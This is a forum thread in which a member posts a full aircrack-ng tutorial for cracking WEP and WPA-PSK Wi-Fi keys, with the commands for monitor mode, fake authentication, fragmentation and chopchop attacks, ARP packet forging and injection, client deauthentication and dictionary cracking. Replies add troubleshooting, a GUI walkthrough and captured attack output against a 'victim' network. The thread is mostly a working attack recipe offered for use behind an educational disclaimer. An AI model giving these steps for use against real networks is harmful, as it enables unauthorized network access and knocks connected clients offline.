LebGeeks

m0ei

Member

WEP and WPA pass cracking! Full Tutorial.

This tutorial is for educational purpose and I'm not responsible for any misuse of the aircrack-ng tool.

Here's a WEP and WPA cracking tutorial.

Wep Cracking Tutorial:

First of all you need Backtrack Live Cd ( ISO or Vmware Image ) that can be downloaded from :
http://www.backtrack-linux.org/downloads/
Or a Linux Distro with Aircrack-ng installed ( it can be cracked with other tools but this tut is for aircrack ).
And the most important thing is that YOU NEED TO HAVE A WIRELESS CARD that SUPPORTS INJECTION.

Description:

Aircrack-ng is an 802.11 WEP and WPA-PSK keys cracking program that can recover keys once enough data packets have been captured. It implements the standard FMS attack along with some optimizations like KoreK attacks, as well as the all-new PTW attack, thus making the attack much faster compared to other WEP cracking tools.

In fact, Aircrack-ng is a set of tools for auditing wireless networks.

Tutorial: How to crack WEP with no wireless clients. (it will work even with clients, work for both).

1) To know what interface your wireless card is using, for example wlan0 or mon0 or ath0 .......
type:

iwconfig

my interface will be "wlan0"

2) to set you wireless card on monitor mode you must type:

airmon-ng start wlan0

2) To know if your wireless card supports injection or not.
open a shell and type:

aireplay-ng -9 wlan0         or           aireplay-ng --test wlan0

3) To dump all the wireless around your wireless card.

airodump-ng wlan0

and it will show you all the wireless names (ESSID), MAC address (BSSID), Channel .......

4) To know your wireless card Mac Address, type:

macchanger -s wlan0

5) After you choose your TARGET, you type:

airodump-ng --bssid (Mac address) -c (channel number) -w (any name) wlan0

Keep this shell and open another to typer the other commands.

6) Use aireplay-ng to do a fake authentication with the access point.

This is a very important step.

In order for an access point to accept a packet, the source MAC address must already be associated. If the source MAC address you are injecting is not associated then the AP ignores the packet and sends out a “DeAuthentication” packet. In this state, no new IVs are created because the AP is ignoring all the injected packets.

The lack of association with the access point is the single biggest reason why injection fails.

To associate with an access point, use fake authentication.

Type:

 aireplay-ng -1 0 -e (Target wireless name or ESSID) -a (Target Mac address or BSSID) -h (your wireless card mac address) wlan0

-e is optional.

7)

The objective of the chopchop and fragmentation attacks is to obtain a PRGA (pseudo random generation algorithm) file. This PRGA is not the WEP key and cannot be used to decrypt packets. However, it can be used to create new packets for injection. The creation of new packets will be covered later in the tutorial.

Here you can use 2 types of attacks. Either you use ChopChop(-4) or Fragmentation(-5) attack.

 aireplay-ng -5 -b (target Mac address or BSSID) -h (your wireless card mac address) wlan0

I prefer Fragmentation but still if Fragmentation didn't work, you can always try ChopChop attack.

 aireplay-ng -4 -b (target Mac address or BSSID) -h (your wireless card mac address) wlan0

When a packet from the access point arrives, enter “y” to proceed. You may need to try a few to be successful.

if succesful then you will get:
"Success! The file “fragment-01234-42132148.xor”= "example.xor" can then be used in the next step to generate an arp packet. "

8) In the previous step, we obtained PRGA. It does not matter which attack generated the PRGA, both are equal. This PRGA is stored in the files ending with “xor”. We can then use this PRGA to generate a packet for injection. We will be generating an arp packet for injection. The objective is to have the access point rebroadcast the injected arp packet. When it rebroadcasts it, a new IV is obtained. All these new IVs will ultimately be used to crack the WEP key.

 packetforge-ng -0 -a (Target mac address or BSSID) -h (your wireless card mac address) -k 255.255.255.255 -l 255.255.255.255 -y (.xor you received in the last step) -w (any name)

9) Now to Inject the arp packet, enter:

aireplay-ng -2 -r (name in -w in packetforge) ath0

or

aireplay-ng -3 -r (name in -w in packetforge) -b (target mac address) -h (your wireless card mac address) wlan0

10) LAST STEP:

 aircrack-ng (name in -w from airodump step 5)-01.cap

if you used step 5) more than 1 time with the same name in -w, check the desktop.
For example, if you used in step 2 -w lebgeek  then you used it again same name, your last step will be lebgeeks-02.cap.

=================================================
Cracking WPA:

WPA/WPA2 supports many types of authentication beyond pre-shared keys. aircrack-ng can ONLY crack pre-shared keys. So make sure airodump-ng shows the network as having the authentication type of PSK, otherwise, don't bother trying to crack it.

The only time you can crack the pre-shared key is if it is a dictionary word or relatively short in length. Conversely, if you want to have an unbreakable wireless network at home, use WPA/WPA2 and a 63 character password composed of random characters including special symbols.

There is another important difference between cracking WPA/WPA2 and WEP. This is the approach used to crack the WPA/WPA2 pre-shared key. Unlike WEP, where statistical methods can be used to speed up the cracking process, only plain brute force techniques can be used against WPA/WPA2. That is, because the key is not static, so collecting IVs like when cracking WEP encryption, does not speed up the attack. The only thing that does give the information to start an attack is the handshake between client and AP. Handshaking is done when the client connects to the network. Although not absolutely true, for the purposes of this tutorial, consider it true. Since the pre-shared key can be from 8 to 63 characters in length, it effectively becomes impossible to crack the pre-shared key.
IMPORTANT This means that the passphrase must be contained in the dictionary you are using to break WPA/WPA2. If it is not in the dictionary then aircrack-ng will be unable to determine the key.

Before we start, There is no difference between cracking WPA or WPA2 networks. The authentication methodology is basically the same between them. So the techniques you use are identical.

1) Start airodump-ng to collect authentication handshake
The purpose of this step is to run airodump-ng to capture the 4-way authentication handshake for the AP we are interested in.
Beware - YOU CAN'T CRACK A WPA WITHOUT GETTING a 4-WAY AUTHENTICATION HANDSHAKE.

Same steps in WEP until STEP 4.
type:

airodump-ng -c (target channel) --bssid (target mac address or BSSID) -w (any name) wlan0

CH  9 ][ Elapsed: 4 s ][ 20010-12-6 16:30 ][ WPA handshake: 00:14:6C:7E:40:80
In the line above, notice the “WPA handshake: 00:14:6C:7E:40:80” in the top right-hand corner. This means airodump-ng has successfully captured the four-way handshake.

2) Use aireplay-ng to deauthenticate the wireless client.

"This step is optional. If you are patient, you can wait until airodump-ng captures a handshake when one or more clients connect to the AP. You only perform this step if you opted to actively speed up the process. The other constraint is that there must be a wireless client currently associated with the AP. If there is no wireless client currently associated with the AP, then you have to be patient and wait for one to connect to the AP so that a handshake can be captured. Needless to say, if a wireless client shows up later and airodump-ng did not capture the handshake, you can backtrack and perform this step.

This step sends a message to the wireless client saying that that it is no longer associated with the AP. The wireless client will then hopefully reauthenticate with the AP. The reauthentication is what generates the 4-way authentication handshake we are interested in collecting. This is what we use to break the WPA/WPA2 pre-shared key."

Based on the output of airodump-ng in the previous step, you determine a client which is currently connected. You need the MAC address for the following.

Open a new shell and type the following:

 aireplay-ng -0 1 -a (target mac address) -c (your wireless card mac address) wlan0

To know if its working or not you should check the output:

 16:30:28  Sending DeAuth to station   -- STMAC: [00:0F:B5:34:30:30]

Tip:"The deauthentication packets are sent directly from your PC to the clients. So you must be physically close enough to the clients for your wireless card transmissions to reach them. To confirm the client received the deauthentication packets, use tcpdump or similar to look for ACK packets back from the client. If you did not get an ACK packet back, then the client did not “hear” the deauthentication packet."

3)Run aircrack-ng to crack the pre-shared key.

aircrack-ng -w (any worldlist .lst ...) -b (Target mac address) (name in -w in airodump-ng)-01.cap

if you get this error:  No valid WPA handshakes found. That means you didn't get any handshake.

Anyway I won't waste my time with WPA cracking because lebanese people use most of the time their phone numbers or strange names as password so its difficult to crack.
WPA cracking could be done by Bruteforcing but imagine how much time it needs to be done ?
check this site to calculate the bruteforcing speed to crack a pass http://lastbit.com/pswcalc.asp

Hope you enjoy it.
Will post some tutorials from time to time.

Last edited by m0ei (December 8 2010)

Ayman

Member

Re: WEP and WPA pass cracking! Full Tutorial.

Very nice and detailed tutorial, thank you very much for the information, keep up the good work :)

amkahal

Member

Re: WEP and WPA pass cracking! Full Tutorial.

from my experience, the signal strength is very critical, and you have to spend a lot of time collecting packets.
in other words, in some situations the operation is near to be impossible.

Bij

Member

Re: WEP and WPA pass cracking! Full Tutorial.

After my experience with many types of test attacks, I can easily say that when it comes to WEP, one of the best manual way to speed up IV capture (if other automatic processes fail) is to continually log in and out or attempting to log in. I had some issues with faking authentication before and was too lazy to solve them.

Last edited by Bij (December 6 2010)

m0ei

Member

Re: WEP and WPA pass cracking! Full Tutorial.

from my experience, the signal strength is very critical, and you have to spend a lot of time collecting packets.
in other words, in some situations the operation is near to be impossible.

ofc the signal strength is very critical but if you have a powerful wireless card this won't be that important.
i rarely have problem with signal strength, max 5 min = pass cracked.

Currently i use http://www.wifly-city.com.tw/en/cp/html/?75.html and i think its great, it have a very good range.

bigjudge

Member

Re: WEP and WPA pass cracking! Full Tutorial.

Hi m0ei

Is this for Linux based OS only? Does it work for windows?. If not do you have any tutorial that works with windows, like vista for example.

Thanks.

Georges

Member

Re: WEP and WPA pass cracking! Full Tutorial.

Hello m0ei,

Thanks for the detailed information about this topic. But I have one simple note here, regarding what you mentioned first about a VMware Image.

Is it plausible to directly attack a wireless network through VMware ? - Since VMware virtualises the Network Adapter to allows the guest O.S to connect to the internet using the Host's connection.

I'd love to see one day a cross-platform application with one single button - Connect To The Internet.
All the hard work should be done in the background... Users should not write a single command.

Bij

Member

Re: WEP and WPA pass cracking! Full Tutorial.

I'd love to see one day a cross-platform application with one single button - Connect To The Internet.
All the hard work should be done in the background... Users should not write a single command.

These applications do exist, but as you will see here:
http://www.engadget.com/2010/09/25/elco … ing-syste/
they cost a lot of money compared to the free solution of copying some terminal commands on a LiveCD boot of a linux distro, plus the tons of other free tools for basic and advanced offensive and defensive security.

xterm

Moderator

Re: WEP and WPA pass cracking! Full Tutorial.

Very nice, thank you. I love your first line.

Bij

Member

Re: WEP and WPA pass cracking! Full Tutorial.

Were you talking to me xterm ?

m0ei

Member

Re: WEP and WPA pass cracking! Full Tutorial.

Hello m0ei,

Thanks for the detailed information about this topic. But I have one simple note here, regarding what you mentioned first about a VMware Image.

Is it plausible to directly attack a wireless network through VMware ? - Since VMware virtualises the Network Adapter to allows the guest O.S to connect to the internet using the Host's connection.

I'd love to see one day a cross-platform application with one single button - Connect To The Internet.
All the hard work should be done in the background... Users should not write a single command.

your welcome, ye it will work normally with Vmware but first if the wireless card is not connected to the VMware you will have to connect it.

oh forgot to mention, it will only work with an "EXTERNAL WIRELESS CARD" on VMware.
your built in wireless card (if it support injection) will work only if you boot the LiveCd via USB or DVD.

Last edited by m0ei (December 8 2010)

dan961

Member

Re: WEP and WPA pass cracking! Full Tutorial.

Do i have to download backtrack on ubuntu? ( sorry, i'm new to linux)

m0ei

Member

Re: WEP and WPA pass cracking! Full Tutorial.

Do i have to download backtrack on ubuntu? ( sorry, i'm new to linux)

Backtrack Is an OS just like Ubuntu. You can't Install an OS into an Other. You can dual boot, but that has nothing to do with your problem.
The tool here is Aircrack-ng and the OS that i'm using is Backtrack.
You can download Backtrack Live CD, or Backtrack Vmware image. Like 1.5-2gb i think.

Last edited by m0ei (January 3 2011)

Joe

Member

Re: WEP and WPA pass cracking! Full Tutorial.

Or you can simply install aircrack-ng on Ubuntu and use it.

Backtrack and Ubuntu have a lot in common. Actually over 50% of the code they run is the same. They simply come with different pre-installed programs, and some differences in configurations.

I'm sure that if you don't feel like downloading such a large file you could ask around on the forum and people would give you a copy of Backtrack.

dan961

Member

Re: WEP and WPA pass cracking! Full Tutorial.

thanks man i already finished downloading backtrack 4 r2 :)

Jingles

Banned

Re: WEP and WPA pass cracking! Full Tutorial.

ur sneaky little... where do u find all of this info

m0ei

Member

Re: WEP and WPA pass cracking! Full Tutorial.

ur sneaky little... where do u find all of this info

found this ? lol
i wrote it. + i'm studying information security. Penetration/hacking/exploiting and other topics.

tufi2

Member

Re: WEP and WPA pass cracking! Full Tutorial.

I use aircrack on the slitaz live distribution : it's a small linux distribution (about 35 MB) made especially for aircrack-ng with all the drivers you need and patched for injection. You can download the iso from here http://aircrack-ng.org/doku.php?id=slitaz and copy it to a cd or sth and then boot it without the need to install anth to the hard disk.

eurybaric

Member

Re: WEP and WPA pass cracking! Full Tutorial.

@Moei do you have any idea if/where i could get this external wifi card in lebanon?

Edit: the one you're using i mean.

Last edited by eurybaric (January 8 2011)

dan961

Member

Re: WEP and WPA pass cracking! Full Tutorial.

Trying to crack my wep key but i'm getting "Failed.Next try with 5000 IVs" in the last step (10) !

m0ei

Member

Re: WEP and WPA pass cracking! Full Tutorial.

you need to wait till you get more IVs.
Wait till it gets to 30-40k IVs and then try the last step.

Last edited by m0ei (January 12 2011)

F0u4d

Member

Re: WEP and WPA pass cracking! Full Tutorial.

Hello,

It's actually a nice tutorial, i been working on getting it work since a month with no luck!
I have a question, sometimes when doing "aireplay-ng -4 -b 00:26:44:26:D7:DF -h 00:25:86:e7:40:7c wlan1" or "aireplay-ng -1 0 -a 00:26:44:26:D7:DF -h 00:25:86:e7:40:7c wlan1
" it says wrong channel so i keep doing it till it goes in the right channel is this normal? or does it affect the process in any way?

And i have a problem on step 8 i'm getting

root@bt:~# aireplay-ng -4 -b 00:26:44:26:D7:DF -h 00:25:86:e7:40:7c wlan1
20:35:27  Waiting for beacon frame (BSSID: 00:26:44:26:D7:DF) on channel 6
Read 1598 packets...

        Size: 68, FromDS: 1, ToDS: 0 (WEP)

              BSSID  =  00:26:44:26:D7:DF
          Dest. MAC  =  FF:FF:FF:FF:FF:FF
         Source MAC  =  00:26:44:26:D7:DE

        0x0000:  0862 0000 ffff ffff ffff 0026 4426 d7df  .b.........&D&..
        0x0010:  0026 4426 d7de 2053 1f4f 8d00 a3e4 278f  .&D&.. S.O....'.
        0x0020:  f4b2 cbc5 54f8 66f1 5f35 e5db c0f7 4c86  ....T.f._5....L.
        0x0030:  1b3d 3c91 a20c d405 c0ba 8131 30f3 4201  .=<........10.B.
        0x0040:  7810 7e8c                                x.~.

Use this packet ? y

Read 1608 packets...

        Size: 68, FromDS: 1, ToDS: 0 (WEP)

              BSSID  =  00:26:44:26:D7:DF
          Dest. MAC  =  FF:FF:FF:FF:FF:FF
         Source MAC  =  00:26:44:26:D7:DE

        0x0000:  0842 0000 ffff ffff ffff 0026 4426 d7df  .B.........&D&..
        0x0010:  0026 4426 d7de 5053 224f 8d00 3b8b bec5  .&D&..PS"O..;...
        0x0020:  cc1d b5b5 e914 c6b1 8524 c31f 1437 1543  .........$...7.C
        0x0030:  ee56 00e8 3582 c217 9884 ddab 81f0 5c33  .V..5.........\3
        0x0040:  63ad 215a                                c.!Z

Use this packet ? y

Saving chosen packet in replay_src-0809-203819.cap

got several deauthentication packets - pausing 3 seconds for reconnection
got several deauthentication packets - pausing 3 seconds for reconnection
got several deauthentication packets - pausing 3 seconds for reconnection
got several deauthentication packets - pausing 3 seconds for reconnection
Sent 7379 packets, current guess: B6...

The chopchop attack appears to have failed. Possible reasons:

Why is it failing after 2 success?(happened twice before after 1 success packet) can it be coz low signal or something ? its a WEP wifi network
and where i can find this "(.xor you received in the last step)" Do i have to write Y many times till i get this?

Sorry if i'm annoying, thought it would be the best place to get help from, my country's peeps

Thanks in advance

Last edited by F0u4d (August 9 2012)

Roudykh

Member

Re: WEP and WPA pass cracking! Full Tutorial.

@FOu4d try fragmentation attack, it could be a low signal.
do you have BT5?
there is an easier method without no single code, begin with this, then try moei method.

1- run gerix-wifi-cracker-ng (it's pre-installed on BT5) it's under exploitation tool> wireless exploitation> wlan exploitation.
2- go to configuration tab. click on your interface then on enable/disable monitor mode. a new inteface will open.
3- click on the new interface and set random mac address.
4- select all channel and click rescan.
5- highlight the network you want to crack its password.
6- go to wep tab and click start sniffing and logging.
7- since cc didn't work with you i'll use fragmentation attack. click on associate with fake ap using fake auth. after you click it, OPN will appear in the terminal opened before.
8- click on fragmentation attack, then type y in the terminal.
9- click create the arp packet to be injected on the victim access oint.
10- now inject it by clicking on inject the created packet. wait until it reach abt 15000 and stop it.
12- go to cracking tab and click on aircrack-ng decrypt wep password.
a new terminal will open.
Key Found!

if you have further questions install my android app, download it from this link (it's not published on the play store):
http://sdrv.ms/LHSOkc

supra

Member

Re: WEP and WPA pass cracking! Full Tutorial.

I have a question, sometimes when doing "aireplay-ng -4 -b 00:26:44:26:D7:DF -h 00:25:86:e7:40:7c wlan1" or "aireplay-ng -1 0 -a 00:26:44:26:D7:DF -h 00:25:86:e7:40:7c wlan1
" it says wrong channel so i keep doing it till it goes in the right channel is this normal? or does it affect the process in any way?

I think that your problem is that you are not using aireplay-ng on the right channel , because the channel changes sometimes so one way to know is to open a new terminal window and use airodump-ng to see all the networks so you can find your victim's new channel , and then retry the aireplay-ng with the channel you found.

Last edited by supra (August 10 2012)

F0u4d

Member

Re: WEP and WPA pass cracking! Full Tutorial.

Hello Roudy,

Thanks for this awesome method with a great tutorial! much appreciated!

Eventhough i had some problem with deauthentication after clicking Y on 1 packet to use but i managed to make it work and get "saving keystream in .... .xor" with different wifi networks

After that i did the next step and got

"Saving choosen packet to in replay.... .cap"
"You should also start airpdump to capture replies."

"End of file."

So after that i went to the last step in the cracking tab and clicked on "aircrack-ng - Decrypt WEP Password"
it opens a terminal and it start testing keys then it stop and nothing happen and i dont get "Key Found!" (I closed the terminal and clicked it again and same thing happened but with different number of tested keys and   IVS)

Please take a look on my screenshots!

Screen 1:

Screen 2:

So i guess i'm stuck at the last step any idea why this happening ?

Thanks..